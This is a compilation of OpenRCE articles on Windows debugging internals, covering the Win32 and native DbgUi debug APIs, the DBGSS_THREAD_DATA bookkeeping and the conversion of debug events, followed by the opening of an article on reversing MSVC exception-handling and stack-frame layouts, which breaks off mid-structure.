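/* Stands in for NtCurrentTeb()->DbgSsReserved[0] */
static DBGSS_THREAD_DATA *SimulatedTebSlot;

static void SaveProcessHandle(unsigned dwProcessId, void *hProcess)
{
    DBGSS_THREAD_DATA *d = calloc(1, sizeof(*d));
    if (!d) return;
    d->ProcessHandle = hProcess;
    d->ProcessId = dwProcessId;
    d->Next = SimulatedTebSlot;  /* link at the head, as the real code does */
    SimulatedTebSlot = d;
}

static void MarkProcessHandle(unsigned dwProcessId)
{
    DBGSS_THREAD_DATA *d;
    for (d = SimulatedTebSlot; d; d = d->Next) {
        /* Only an entry without a thread ID describes the process itself */
        if (d->ProcessId == dwProcessId && !d->ThreadId) {
            d->HandleMarked = 1;
            break;
        }
    }
}
```

Newer entries always end up at the head of the list, which is why the later lookup routines must walk the list linearly to find a matching process or thread ID.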
Although you can probably guess the SaveThreadHandle implementation yourself, let's look at it for completeness's sake:

VOID WINAPI SaveThreadHandle(IN DWORD dwProcessId,
                             IN DWORD dwThreadId,
                             IN HANDLE hThread)
{
    PDBGSS_THREAD_DATA ThreadData;

    /* Allocate a thread structure */
    ThreadData = RtlAllocateHeap(RtlGetProcessHeap(), 0, sizeof(DBGSS_THREAD_DATA));
    if (!ThreadData) return;

    /* Fill it out */
    ThreadData->ThreadHandle = hThread;
    ThreadData->ProcessId = dwProcessId;
    ThreadData->ThreadId = dwThreadId;
    ThreadData->ProcessHandle = NULL;
    ThreadData->HandleMarked = FALSE;

    /* Link it */
    ThreadData->Next = DbgSsGetThreadData();
    DbgSsSetThreadData(ThreadData);
}

As expected, nothing new here. The MarkThread/ProcessHandle functions are just as straightforward:

VOID WINAPI MarkThreadHandle(IN DWORD dwThreadId)
{
    PDBGSS_THREAD_DATA ThreadData;

    /* Loop all thread data events */
    ThreadData = DbgSsGetThreadData();
    while (ThreadData)
    {
        /* Check if this one matches */
        if (ThreadData->ThreadId == dwThreadId)
        {
            /* Mark the structure and break out */
            ThreadData->HandleMarked = TRUE;
            break;
        }

        /* Move to the next one */
        ThreadData = ThreadData->Next;
    }
}

VOID WINAPI MarkProcessHandle(IN DWORD dwProcessId)
{
    PDBGSS_THREAD_DATA ThreadData;

    /* Loop all thread data events */
    ThreadData = DbgSsGetThreadData();
    while (ThreadData)
    {
        /* Check if this one matches */
        if (ThreadData->ProcessId == dwProcessId)
        {
            /* Make sure the thread ID is empty */
            if (!ThreadData->ThreadId)
            {
                /* Mark the structure and break out */
                ThreadData->HandleMarked = TRUE;
                break;
            }
        }

        /* Move to the next one */
        ThreadData = ThreadData->Next;
    }
}

Notice that the only less-than-trivial implementation detail is that the array needs to be parsed in order to find the matching process and thread ID. Now that we've taken a look at these structures, let's see the associated ContinueDebugEvent API, which picks up after a WaitForDebugEvent API in order to resume the thread.
BOOLWINAPI ContinueDebugEvent(IN DWORD dwProcessId, IN DWORD dwThreadId, IN DWORD dwContinueStatus) { CLIENT_ID ClientId; NTSTATUS Status; /* Set the Client ID */ ClientId.UniqueProcess = (HANDLE)dwProcessId; ClientId.UniqueThread = (HANDLE)dwThreadId; /* Continue debugging */ Status = DbgUiContinue(&ClientId, dwContinueStatus); if (!NT_SUCCESS(Status)) { /* Fail */ SetLastErrorByStatus(Status); return FALSE; } /* Remove the process/thread handles */ RemoveHandles(dwProcessId, dwThreadId); /* Success */ return TRUE; } Again, we're dealing with a DbgUI API, DbgUiContinue, which is going to do all the work for us. Our only job is to call RemoveHandles, which is part of the high-level structures that wrap DbgUi. This functions is slightly more complex then what we've seen, because we're given PID/TIDs, so we need to do some lookups: VOIDWINAPI RemoveHandles(IN DWORD dwProcessId, IN DWORD dwThreadId) { PDBGSS_THREAD_DATA ThreadData; /* Loop all thread data events */ ThreadData = DbgSsGetThreadData(); while (ThreadData) { /* Check if this one matches */ if (ThreadData->ProcessId == dwProcessId) { /* Make sure the thread ID matches too */ if (ThreadData->ThreadId == dwThreadId) { /* Check if we have a thread handle */ if (ThreadData->ThreadHandle) { /* Close it */ CloseHandle(ThreadData->ThreadHandle); } /* Check if we have a process handle */ if (ThreadData->ProcessHandle) { /* Close it */ CloseHandle(ThreadData->ProcessHandle); } /* Unlink the thread data */ DbgSsSetThreadData(ThreadData->Next); /* Free it*/ RtlFreeHeap(RtlGetProcessHeap(), 0, ThreadData); /* Move to the next structure */ ThreadData = DbgSsGetThreadData(); continue; } } /* Move to the next one */ ThreadData = ThreadData->Next; } } Not much explaining is required. As we parse the circular buffer, we try to locate a structure which matches the PID and TID that we were given. Once it's been located, we check if a handle is associated with the thread and the process. 
If it is, then we can now close the handle. Therefore, the use of this high-level Win32 mechanism is now apparent: it's how we can associate handles with IDs, and close them when cleaning up or continuing. This is because these handles were not opened by Win32, but behind its back by Dbgk. Once the handles are closed, we unlink the structure by changing the TEB pointer to the next structure in the list, and then free it. We then resume parsing from the next structure on (because more than one such structure could be associated with this PID/TID). Finally, one last piece of the Win32 puzzle is missing in our analysis: the detach function, which was added in XP. Let's take a look at its trivial implementation:

BOOL WINAPI DebugActiveProcessStop(IN DWORD dwProcessId)
{
    NTSTATUS Status;
    HANDLE Handle;

    /* Get the process handle */
    Handle = ProcessIdToHandle(dwProcessId);
    if (!Handle) return FALSE;

    /* Close all the process handles */
    CloseAllProcessHandles(dwProcessId);

    /* Now stop debugging the process */
    Status = DbgUiStopDebugging(Handle);
    NtClose(Handle);

    /* Check for failure */
    if (!NT_SUCCESS(Status))
    {
        /* Fail */
        SetLastError(ERROR_ACCESS_DENIED);
        return FALSE;
    }

    /* Success */
    return TRUE;
}

It couldn't really get any simpler. Just like for attaching, we first convert the PID to a handle, and then use a DbgUi call (DbgUiStopDebugging) with this process handle in order to detach ourselves from the process. There's one more call being made here, CloseAllProcessHandles, which is part of Win32's high-level debugging layer on top of DbgUi that we've seen earlier.
This routine is very similar to RemoveHandles, but it only deals with a process ID, so the implementation is simpler:

VOID WINAPI CloseAllProcessHandles(IN DWORD dwProcessId)
{
    PDBGSS_THREAD_DATA ThreadData;

    /* Loop all thread data events */
    ThreadData = DbgSsGetThreadData();
    while (ThreadData)
    {
        /* Check if this one matches */
        if (ThreadData->ProcessId == dwProcessId)
        {
            /* Check if we have a thread handle */
            if (ThreadData->ThreadHandle)
            {
                /* Close it */
                CloseHandle(ThreadData->ThreadHandle);
            }

            /* Check if we have a process handle */
            if (ThreadData->ProcessHandle)
            {
                /* Close it */
                CloseHandle(ThreadData->ProcessHandle);
            }

            /* Unlink the thread data */
            DbgSsSetThreadData(ThreadData->Next);

            /* Free it */
            RtlFreeHeap(RtlGetProcessHeap(), 0, ThreadData);

            /* Move to the next structure */
            ThreadData = DbgSsGetThreadData();
            continue;
        }

        /* Move to the next one */
        ThreadData = ThreadData->Next;
    }
}

And this completes our analysis of the Win32 APIs! Let's take a look at what we've learnt:

- The actual debugging functionality is present in a module called Dbgk inside the kernel. It's accessible through the DbgUi Native API interface, located inside the NT System Library, ntdll.
- Dbgk implements debugging functionality through an NT Object, called a Debug Object, which also provides an NtSetInformation API in order to modify certain flags.
- The Debug Object associated with a thread can be retrieved with DbgUiGetThreadObject, but we have not yet shown where this is stored.
- Checking if a process is being debugged can be done by using NtQueryInformationProcess with the ProcessDebugPort information class. This cannot be cheated without a rootkit.
- Because Dbgk opens certain handles during debug events, Win32 needs a way to associate IDs with handles, and uses a circular array of structures called DBGSS_THREAD_DATA, stored in the TEB's DbgSsReserved[0] member.

Source: OpenRCE
9. Windows Native Debugging Internals

Author: Alex Ionescu

Introduction

In part two of this three-part article series, the native interface to Windows debugging is dissected in detail. The reader is expected to have some basic knowledge of C and general NT kernel architecture and semantics. Also, this is not an introduction to what debugging is or how to write a debugger. It is meant as a reference for experienced debugger writers, or curious security experts.

Native Debugging

Now it's time to look at the native side of things, and how the wrapper layer inside ntdll.dll communicates with the kernel. The advantage of having the DbgUi layer is that it allows better separation between Win32 and the NT kernel, which has always been a part of NT design. NTDLL and NTOSKRNL are built together, so it's normal for them to have intricate knowledge of each other. They share the same structures, they need to have the same system call IDs, etc. In a perfect world, the NT kernel should have to know nothing about Win32. Additionally, DbgUi helps anyone who wants to write debugging capabilities inside a native application, or to write a fully-featured native-mode debugger. Without DbgUi, one would have to call the Nt*DebugObject APIs manually, and do some extensive pre/post-processing in some cases. DbgUi simplifies all this work to a simple call, and provides a clean interface for it. If the kernel changes internally, DbgUi will probably stay the same; only its internal code would be modified. We start our exploration with the function responsible for creating and associating a Debug Object with the current process. Unlike in the Win32 world, there is a clear distinction between creating a Debug Object and actually attaching to a process.
NTSTATUSNTAPI DbgUiConnectToDbg(VOID) { OBJECT_ATTRIBUTES ObjectAttributes; /* Don't connect twice */ if (NtCurrentTeb()->DbgSsReserved[1]) return STATUS_SUCCESS; /* Setup the Attributes */ InitializeObjectAttributes(&ObjectAttributes, NULL, 0, NULL, 0); /* Create the object */ return ZwCreateDebugObject(&NtCurrentTeb()->DbgSsReserved[1], DEBUG_OBJECT_ALL_ACCESS, &ObjectAttributes, TRUE); } As you can see, this is a trivial implementation, but it shows us two things. Firstly, a thread can only have one debug object associated to it, and secondly, the handle to this object is stored in the TEB's DbgSsReserved array field. Recall that in Win32, the first index, [0], is where the Thread Data was stored. We've now learnt that [1] is where the handle is stored. Now let's see how attaching and detaching are done: NTSTATUSNTAPI DbgUiDebugActiveProcess(IN HANDLE Process) { NTSTATUS Status; /* Tell the kernel to start debugging */ Status = NtDebugActiveProcess(Process, NtCurrentTeb()->DbgSsReserved[1]); if (NT_SUCCESS(Status)) { /* Now break-in the process */ Status = DbgUiIssueRemoteBreakin(Process); if (!NT_SUCCESS(Status)) { /* We couldn't break-in, cancel debugging */ DbgUiStopDebugging(Process); } } /* Return status */ return Status; } NTSTATUS NTAPI DbgUiStopDebugging(IN HANDLE Process) { /* Call the kernel to remove the debug object */ return NtRemoveProcessDebug(Process, NtCurrentTeb()->DbgSsReserved[1]); } Again, these are very simple implementations. We can learn, however, that the kernel is not responsible for actually breaking inside the remote process, but that this is done by the native layer. 
This DbgUiIssueRemoteBreakin API is also used by Win32 when calling DebugBreakProcess, so let's look at it: NTSTATUSNTAPI DbgUiIssueRemoteBreakin(IN HANDLE Process) { HANDLE hThread; CLIENT_ID ClientId; NTSTATUS Status; /* Create the thread that will do the breakin */ Status = RtlCreateUserThread(Process, NULL, FALSE, 0, 0, PAGE_SIZE, (PVOID)DbgUiRemoteBreakin, NULL, &hThread, &ClientId); /* Close the handle on success */ if(NT_SUCCESS(Status)) NtClose(hThread); /* Return status */ return Status; } All it does is create a remote thread inside the process, and then return to the caller. Does that remote thread do anything magic? Let's see: VOIDNTAPI DbgUiRemoteBreakin(VOID) { /* Make sure a debugger is enabled; if so, breakpoint */ if (NtCurrentPeb()->BeingDebugged) DbgBreakPoint(); /* Exit the thread */ RtlExitUserThread(STATUS_SUCCESS); } Nothing special at all; the thread makes sure that the process is really being debugged, and then issues a breakpoint. And, because this API is exported, you can call it locally from your own process to issue a debug break (but note that you will kill your own thread). In our look at the Win32 Debugging implementation, we've noticed that the actual debug handle is never used, and that calls always go through DbgUi. Then the NtSetInformationDebugObject system call was called, a special DbgUi API was called before, to actually get the debug object associated with the thread. This API also has a counterpart, so let's see both in action: HANDLENTAPI DbgUiGetThreadDebugObject(VOID) { /* Just return the handle from the TEB */ return NtCurrentTeb()->DbgSsReserved[1]; } VOID NTAPI DbgUiSetThreadDebugObject(HANDLE DebugObject) { /* Just set the handle in the TEB */ NtCurrentTeb()->DbgSsReserved[1] = DebugObject; } For those familiar with object-oriented programming, this will seem similar to the concept of accessor and mutator methods. 
Even though Win32 has perfect access to this handle and could simply read it on its own, the NT developers decided to make DbgUi much like a class, and make sure access to the handle goes through these public methods. This design allows the debug handle to be stored anywhere else if necessary, and only these two APIs will require changes, instead of multiple DLLs in Win32. Now for a visit of the wait/continue functions, which under Win32 were simply wrappers: NTSTATUSNTAPI DbgUiContinue(IN PCLIENT_ID ClientId, IN NTSTATUS ContinueStatus) { /* Tell the kernel object to continue */ return ZwDebugContinue(NtCurrentTeb()->DbgSsReserved[1], ClientId, ContinueStatus); } NTSTATUS NTAPI DbgUiWaitStateChange(OUT PDBGUI_WAIT_STATE_CHANGE DbgUiWaitStateCange, IN PLARGE_INTEGER TimeOut OPTIONAL) { /* Tell the kernel to wait */ return NtWaitForDebugEvent(NtCurrentTeb()->DbgSsReserved[1], TRUE, TimeOut, DbgUiWaitStateCange); } Not surprisingly, these functions are also wrappers in DbgUi. However, this is where things start to get interesting, since if you'll recall, DbgUi uses a completely different structure for debug events, called DBGUI_WAIT_STATE_CHANGE. 
There is one API that we have left to look at, which does the conversion, so first, let's look at the documentation for this structure: //// User-Mode Debug State Change Structure // typedef struct _DBGUI_WAIT_STATE_CHANGE { DBG_STATE NewState; CLIENT_ID AppClientId; union { struct { HANDLE HandleToThread; DBGKM_CREATE_THREAD NewThread; } CreateThread; struct { HANDLE HandleToProcess; HANDLE HandleToThread; DBGKM_CREATE_PROCESS NewProcess; } CreateProcessInfo; DBGKM_EXIT_THREAD ExitThread; DBGKM_EXIT_PROCESS ExitProcess; DBGKM_EXCEPTION Exception; DBGKM_LOAD_DLL LoadDll; DBGKM_UNLOAD_DLL UnloadDll; } StateInfo; } DBGUI_WAIT_STATE_CHANGE, *PDBGUI_WAIT_STATE_CHANGE; The fields should be pretty self-explanatory, so let's look at the DBG_STATE enumeration: //// Debug States // typedef enum _DBG_STATE { DbgIdle, DbgReplyPending, DbgCreateThreadStateChange, DbgCreateProcessStateChange, DbgExitThreadStateChange, DbgExitProcessStateChange, DbgExceptionStateChange, DbgBreakpointStateChange, DbgSingleStepStateChange, DbgLoadDllStateChange, DbgUnloadDllStateChange } DBG_STATE, *PDBG_STATE; If you take a look at the Win32 DEBUG_EVENT structure and associated debug event types, you'll notice some differences which might be useful to you. For starters, Exceptions, Breakpoints and Single Step exceptions are handled differently. In the Win32 world, only two distinctions are made: RIP_EVENT for exceptions, and EXCEPTION_DEBUG_EVENT for a debug event. Although code can later figure out if this was a breakpoint or single step, this information comes directly in the native structure. You will also notice that OUTPUT_DEBUG_STRING event is missing. Here, it's DbgUi that's at a disadvantage, since the information is sent as an Exception, and post-processing is required (which we'll take a look at soon). There are also two more states that Win32 does not support, which is the Idle state and the Reply Pending state. 
These don't offer much information from the point of view of a debugger, so they are ignored. Now let's take a look at the actual structures seen in the unions: //// Debug Message Structures // typedef struct _DBGKM_EXCEPTION { EXCEPTION_RECORD ExceptionRecord; ULONG FirstChance; } DBGKM_EXCEPTION, *PDBGKM_EXCEPTION; typedef struct _DBGKM_CREATE_THREAD { ULONG SubSystemKey; PVOID StartAddress; } DBGKM_CREATE_THREAD, *PDBGKM_CREATE_THREAD; typedef struct _DBGKM_CREATE_PROCESS { ULONG SubSystemKey; HANDLE FileHandle; PVOID BaseOfImage; ULONG DebugInfoFileOffset; ULONG DebugInfoSize; DBGKM_CREATE_THREAD InitialThread; } DBGKM_CREATE_PROCESS, *PDBGKM_CREATE_PROCESS; typedef struct _DBGKM_EXIT_THREAD { NTSTATUS ExitStatus; } DBGKM_EXIT_THREAD, *PDBGKM_EXIT_THREAD; typedef struct _DBGKM_EXIT_PROCESS { NTSTATUS ExitStatus; } DBGKM_EXIT_PROCESS, *PDBGKM_EXIT_PROCESS; typedef struct _DBGKM_LOAD_DLL { HANDLE FileHandle; PVOID BaseOfDll; ULONG DebugInfoFileOffset; ULONG DebugInfoSize; PVOID NamePointer; } DBGKM_LOAD_DLL, *PDBGKM_LOAD_DLL; typedef struct _DBGKM_UNLOAD_DLL { PVOID BaseAddress; } DBGKM_UNLOAD_DLL, *PDBGKM_UNLOAD_DLL; If you're familiar with the DEBUG_EVENT structure, you should notice some subtle differences. First of all, no indication of the process name, which explains why MSDN documents this field being optional and not used by Win32. You will also notice the lack of a pointer to the TEB in the thread structure. Finally, unlike new processes, Win32 does display the name of any new DLL loaded, but this also seems to be missing in the Load DLL structure; we'll see how this and other changes are dealt with soon. As far as extra information goes however, we have the "SubsystemKey" field. Because NT was designed to support multiple subsystems, this field is critical to identifying from which subsystem the new thread or process was created from. 
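The translation between these native states and the Win32 event codes can be sketched as a simple mapping. The enum order follows the DBG_STATE definition above; the numeric values are the documented Win32 DEBUG_EVENT constants, redefined here so the sketch is self-contained:

```c
/* Sketch of the state-to-event-code mapping performed during conversion
   of a native state change into a Win32 DEBUG_EVENT. */
typedef enum _DBG_STATE {
    DbgIdle, DbgReplyPending,
    DbgCreateThreadStateChange, DbgCreateProcessStateChange,
    DbgExitThreadStateChange, DbgExitProcessStateChange,
    DbgExceptionStateChange, DbgBreakpointStateChange,
    DbgSingleStepStateChange, DbgLoadDllStateChange,
    DbgUnloadDllStateChange
} DBG_STATE;

enum { /* Win32 dwDebugEventCode values, as documented on MSDN */
    EXCEPTION_DEBUG_EVENT = 1, CREATE_THREAD_DEBUG_EVENT = 2,
    CREATE_PROCESS_DEBUG_EVENT = 3, EXIT_THREAD_DEBUG_EVENT = 4,
    EXIT_PROCESS_DEBUG_EVENT = 5, LOAD_DLL_DEBUG_EVENT = 6,
    UNLOAD_DLL_DEBUG_EVENT = 7
};

static int StateToWin32EventCode(DBG_STATE state)
{
    switch (state) {
    case DbgCreateThreadStateChange:  return CREATE_THREAD_DEBUG_EVENT;
    case DbgCreateProcessStateChange: return CREATE_PROCESS_DEBUG_EVENT;
    case DbgExitThreadStateChange:    return EXIT_THREAD_DEBUG_EVENT;
    case DbgExitProcessStateChange:   return EXIT_PROCESS_DEBUG_EVENT;
    /* Exceptions, breakpoints and single-steps all fold into one Win32
       code; debug prints and RIP events are only distinguished later by
       inspecting the exception record. */
    case DbgExceptionStateChange:
    case DbgBreakpointStateChange:
    case DbgSingleStepStateChange:    return EXCEPTION_DEBUG_EVENT;
    case DbgLoadDllStateChange:       return LOAD_DLL_DEBUG_EVENT;
    case DbgUnloadDllStateChange:     return UNLOAD_DLL_DEBUG_EVENT;
    default:                          return 0; /* DbgIdle/DbgReplyPending: no Win32 mapping */
    }
}
```

This is the skeleton of what DbgUiConvertStateChangeStructure does; the real routine additionally copies the per-event data and performs the fixups discussed next.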
Windows 2003 SP1 adds support for debugging POSIX applications, and while I haven't looked at the POSIX debug APIs, I'm convinced they're built around the DbgUi implementation, and that this field is used differently by the POSIX library (much like Win32 ignores it). Now that we've seen the differences, the final API to look at is DbgUiConvertStateChangeStructure, which is responsible for doing these modifications and fixups: NTSTATUSNTAPI DbgUiConvertStateChangeStructure(IN PDBGUI_WAIT_STATE_CHANGE WaitStateChange, OUT PVOID Win32DebugEvent) { NTSTATUS Status; OBJECT_ATTRIBUTES ObjectAttributes; THREAD_BASIC_INFORMATION ThreadBasicInfo; LPDEBUG_EVENT DebugEvent = Win32DebugEvent; HANDLE ThreadHandle; /* Write common data */ DebugEvent->dwProcessId = (DWORD)WaitStateChange-> AppClientId.UniqueProcess; DebugEvent->dwThreadId = (DWORD)WaitStateChange->AppClientId.UniqueThread; /* Check what kind of even this is */ switch (WaitStateChange->NewState) { /* New thread */ case DbgCreateThreadStateChange: /* Setup Win32 code */ DebugEvent->dwDebugEventCode = CREATE_THREAD_DEBUG_EVENT; /* Copy data over */ DebugEvent->u.CreateThread.hThread = WaitStateChange->StateInfo.CreateThread.HandleToThread; DebugEvent->u.CreateThread.lpStartAddress = WaitStateChange->StateInfo.CreateThread.NewThread.StartAddress; /* Query the TEB */ Status = NtQueryInformationThread(WaitStateChange->StateInfo. 
CreateThread.HandleToThread, ThreadBasicInformation, &ThreadBasicInfo, sizeof(ThreadBasicInfo), NULL); if (!NT_SUCCESS(Status)) { /* Failed to get PEB address */ DebugEvent->u.CreateThread.lpThreadLocalBase = NULL; } else { /* Write PEB Address */ DebugEvent->u.CreateThread.lpThreadLocalBase = ThreadBasicInfo.TebBaseAddress; } break; /* New process */ case DbgCreateProcessStateChange: /* Write Win32 debug code */ DebugEvent->dwDebugEventCode = CREATE_PROCESS_DEBUG_EVENT; /* Copy data over */ DebugEvent->u.CreateProcessInfo.hProcess = WaitStateChange->StateInfo.CreateProcessInfo.HandleToProcess; DebugEvent->u.CreateProcessInfo.hThread = WaitStateChange->StateInfo.CreateProcessInfo.HandleToThread; DebugEvent->u.CreateProcessInfo.hFile = WaitStateChange->StateInfo.CreateProcessInfo.NewProcess. FileHandle; DebugEvent->u.CreateProcessInfo.lpBaseOfImage = WaitStateChange->StateInfo.CreateProcessInfo.NewProcess. BaseOfImage; DebugEvent->u.CreateProcessInfo.dwDebugInfoFileOffset = WaitStateChange->StateInfo.CreateProcessInfo.NewProcess. DebugInfoFileOffset; DebugEvent->u.CreateProcessInfo.nDebugInfoSize = WaitStateChange->StateInfo.CreateProcessInfo.NewProcess. DebugInfoSize; DebugEvent->u.CreateProcessInfo.lpStartAddress = WaitStateChange->StateInfo.CreateProcessInfo.NewProcess. InitialThread.StartAddress; /* Query TEB address */ Status = NtQueryInformationThread(WaitStateChange->StateInfo. 
CreateProcessInfo.HandleToThread, ThreadBasicInformation, &ThreadBasicInfo, sizeof(ThreadBasicInfo), NULL); if (!NT_SUCCESS(Status)) { /* Failed to get PEB address */ DebugEvent->u.CreateThread.lpThreadLocalBase = NULL; } else { /* Write PEB Address */ DebugEvent->u.CreateThread.lpThreadLocalBase = ThreadBasicInfo.TebBaseAddress; } /* Clear image name */ DebugEvent->u.CreateProcessInfo.lpImageName = NULL; DebugEvent->u.CreateProcessInfo.fUnicode = TRUE; break; /* Thread exited */ case DbgExitThreadStateChange: /* Write the Win32 debug code and the exit status */ DebugEvent->dwDebugEventCode = EXIT_THREAD_DEBUG_EVENT; DebugEvent->u.ExitThread.dwExitCode = WaitStateChange->StateInfo.ExitThread.ExitStatus; break; /* Process exited */ case DbgExitProcessStateChange: /* Write the Win32 debug code and the exit status */ DebugEvent->dwDebugEventCode = EXIT_PROCESS_DEBUG_EVENT; DebugEvent->u.ExitProcess.dwExitCode = WaitStateChange->StateInfo.ExitProcess.ExitStatus; break; /* Any sort of exception */ case DbgExceptionStateChange: case DbgBreakpointStateChange: case DbgSingleStepStateChange: /* Check if this was a debug print */ if (WaitStateChange->StateInfo.Exception.ExceptionRecord. ExceptionCode == DBG_PRINTEXCEPTION_C) { /* Set the Win32 code */ DebugEvent->dwDebugEventCode = OUTPUT_DEBUG_STRING_EVENT; /* Copy debug string information */ DebugEvent->u.DebugString.lpDebugStringData = (PVOID)WaitStateChange-> StateInfo.Exception.ExceptionRecord. ExceptionInformation[1]; DebugEvent->u.DebugString.nDebugStringLength = WaitStateChange->StateInfo.Exception.ExceptionRecord. ExceptionInformation[0]; DebugEvent->u.DebugString.fUnicode = FALSE; } else if (WaitStateChange->StateInfo.Exception.ExceptionRecord. ExceptionCode == DBG_RIPEXCEPTION) { /* Set the Win32 code */ DebugEvent->dwDebugEventCode = RIP_EVENT; /* Set exception information */ DebugEvent->u.RipInfo.dwType = WaitStateChange->StateInfo.Exception.ExceptionRecord. 
ExceptionInformation[1]; DebugEvent->u.RipInfo.dwError = WaitStateChange->StateInfo.Exception.ExceptionRecord. ExceptionInformation[0]; } else { /* Otherwise, this is a debug event, copy info over */ DebugEvent->dwDebugEventCode = EXCEPTION_DEBUG_EVENT; DebugEvent->u.Exception.ExceptionRecord = WaitStateChange->StateInfo.Exception.ExceptionRecord; DebugEvent->u.Exception.dwFirstChance = WaitStateChange->StateInfo.Exception.FirstChance; } break; /* DLL Load */ case DbgLoadDllStateChange : /* Set the Win32 debug code */ DebugEvent->dwDebugEventCode = LOAD_DLL_DEBUG_EVENT; /* Copy the rest of the data */ DebugEvent->u.LoadDll.lpBaseOfDll = WaitStateChange->StateInfo.LoadDll.BaseOfDll; DebugEvent->u.LoadDll.hFile = WaitStateChange->StateInfo.LoadDll.FileHandle; DebugEvent->u.LoadDll.dwDebugInfoFileOffset = WaitStateChange->StateInfo.LoadDll.DebugInfoFileOffset; DebugEvent->u.LoadDll.nDebugInfoSize = WaitStateChange->StateInfo.LoadDll.DebugInfoSize; /* Open the thread */ InitializeObjectAttributes(&ObjectAttributes, NULL, 0, NULL, NULL); Status = NtOpenThread(&ThreadHandle, THREAD_QUERY_INFORMATION, &ObjectAttributes, &WaitStateChange->AppClientId); if (NT_SUCCESS(Status)) { /* Query thread information */ Status = NtQueryInformationThread(ThreadHandle, ThreadBasicInformation, &ThreadBasicInfo, sizeof(ThreadBasicInfo), NULL); NtClose(ThreadHandle); } /* Check if we got thread information */ if (NT_SUCCESS(Status)) { /* Save the image name from the TIB */ DebugEvent->u.LoadDll.lpImageName = &((PTEB)ThreadBasicInfo.TebBaseAddress)-> Tib.ArbitraryUserPointer; } else { /* Otherwise, no name */ DebugEvent->u.LoadDll.lpImageName = NULL; } /* It's Unicode */ DebugEvent->u.LoadDll.fUnicode = TRUE; break; /* DLL Unload */ case DbgUnloadDllStateChange: /* Set Win32 code and DLL Base */ DebugEvent->dwDebugEventCode = UNLOAD_DLL_DEBUG_EVENT; DebugEvent->u.UnloadDll.lpBaseOfDll = WaitStateChange->StateInfo.UnloadDll.BaseAddress; break; /* Anything else, fail */ default: return 
STATUS_UNSUCCESSFUL; } /* Return success */ return STATUS_SUCCESS; }

Let's take a look at the interesting fixups. First of all, the lack of a TEB pointer is easily fixed by calling NtQueryInformationThread with the ThreadBasicInformation class, which returns, among other things, a pointer to the TEB, which is then saved in the Win32 structure. As for debug strings, the API analyzes the exception code and looks for DBG_PRINTEXCEPTION_C, which has a specific exception record that is parsed and converted into a debug string output. So far so good, but perhaps the nastiest hack is present in the code for DLL loading. Because a loaded DLL doesn't have a structure like EPROCESS or ETHREAD in kernel memory, but only in ntdll's private Ldr structures, the only thing that identifies it is a Section Object in memory for its memory-mapped file. When the kernel gets a request to create a section for an executable memory-mapped file, it saves the name of the file in a field inside the TEB (or TIB, rather) called ArbitraryUserPointer. This function then knows that a string is located there, and sets it as the pointer for the debug event's lpImageName member. This hack has been in NT ever since the first builds, and as far as I know, it's still there in Vista. Could it be that hard to solve?

Once again, we come to an end in our discussion, since there isn't much left in ntdll that deals with the Debug Object. Here's an overview of what was discussed in this part of the series:

- DbgUi provides a level of separation between the kernel and Win32 or other subsystems. It's written as a fully independent class, even having accessor and mutator methods instead of exposing its handles.
- The handle to a thread's Debug Object is stored in the second field of the DbgSsReserved array in the TEB.
- DbgUi allows a thread to have a single Debug Object, but using the native system calls allows you to use as many as you want.
- Most DbgUi APIs are simple wrappers around the NtXxxDebugObject system calls, and use the TEB handle to communicate.
- DbgUi is responsible for breaking into the attached process, not the kernel.
- DbgUi uses its own structure for debug events, which the kernel understands. In some ways, this structure provides more information about some events (such as the subsystem, and whether this was a single-step or a breakpoint exception), but in others, some information is missing (such as a pointer to the thread's TEB or a separate debug string structure).
- The TIB (located inside the TEB)'s ArbitraryUserPointer member contains the name of the loaded DLL during a debug event.

Source: OpenRCE
10. Reversing Microsoft Visual C++ Part I: Exception Handling

Author: igorsk

Abstract

Microsoft Visual C++ is the most widely used compiler for Win32, so it is important for the Win32 reverser to be familiar with its inner workings. Being able to recognize the compiler-generated glue code helps to quickly concentrate on the actual code written by the programmer. It also helps in recovering the high-level structure of the program. In part I of this 2-part article (see also: Part II: Classes, Methods and RTTI), I will concentrate on the stack layout, exception handling and related structures in MSVC-compiled programs. Some familiarity with assembler, registers, calling conventions etc. is assumed.

Terms:

Stack frame: A fragment of the stack segment used by a function. Usually contains function arguments, return-to-caller address, saved registers, local variables and other data specific to this function. On x86 (and most other architectures) caller and callee stack frames are contiguous.

Frame pointer: A register or other variable that points to a fixed location inside the stack frame. Usually all data inside the stack frame is addressed relative to the frame pointer. On x86 it's usually ebp and it usually points just below the return address.

Object: An instance of a (C++) class.

Unwindable Object: A local object with auto storage-class specifier that is allocated on the stack and needs to be destructed when it goes out of scope.

Stack Unwinding: Automatic destruction of such objects that happens when control leaves the scope due to an exception.

There are two types of exceptions that can be used in a C or C++ program.

SEH exceptions (from "Structured Exception Handling"). Also known as Win32 or system exceptions. These are exhaustively covered in the famous Matt Pietrek article[1]. They are the only exceptions available to C programs. The compiler-level support includes keywords __try, __except, __finally and a few others.
C++ exceptions (sometimes referred to as "EH"). Implemented on top of SEH, C++ exceptions allow throwing and catching of arbitrary types. A very important feature of C++ is automatic stack unwinding during exception processing, and MSVC uses a pretty complex underlying framework to ensure that it works properly in all cases.

In the following diagrams memory addresses increase from top to bottom, so the stack grows "up". This is the way the stack is represented in IDA, and opposite to most other publications.

Basic Frame Layout

The most basic stack frame looks like the following:

...
Local variables
Other saved registers
Saved ebp
Return address
Function arguments
...

Note: If frame pointer omission is enabled, saved ebp might be absent.

SEH

In cases where compiler-level SEH (__try/__except/__finally) is used, the stack layout gets a little more complicated.

SEH3 Stack Layout

When there are no __except blocks in a function (only __finally), Saved ESP is not used. The scopetable is an array of records which describe each __try block and the relationships between them:

struct _SCOPETABLE_ENTRY {
    DWORD EnclosingLevel;
    void* FilterFunc;
    void* HandlerFunc;
}

For more details on the SEH implementation see [1]. To recover try blocks, watch how the try level variable is updated. It's assigned a unique number per try block, and nesting is described by the relationship between scopetable entries. E.g. if scopetable entry i has EnclosingLevel=j, then try block j encloses try block i. The function body is considered to have try level -1. See Appendix 1 for an example.

Buffer Overrun Protection

The Whidbey (MSVC 2005) compiler adds some buffer overrun protection for the SEH frames. The full stack frame layout in it looks like the following:

SEH4 Stack Layout

The GS cookie is present only if the function was compiled with the /GS switch. The EH cookie is always present.
The SEH4 scopetable is basically the same as the SEH3 one, only with an added header:

struct _EH4_SCOPETABLE {
    DWORD GSCookieOffset;
    DWORD GSCookieXOROffset;
    DWORD EHCookieOffset;
    DWORD EHCookieXOROffset;
    _EH4_SCOPETABLE_RECORD ScopeRecord[1];
};

struct _EH4_SCOPETABLE_RECORD {
    DWORD EnclosingLevel;
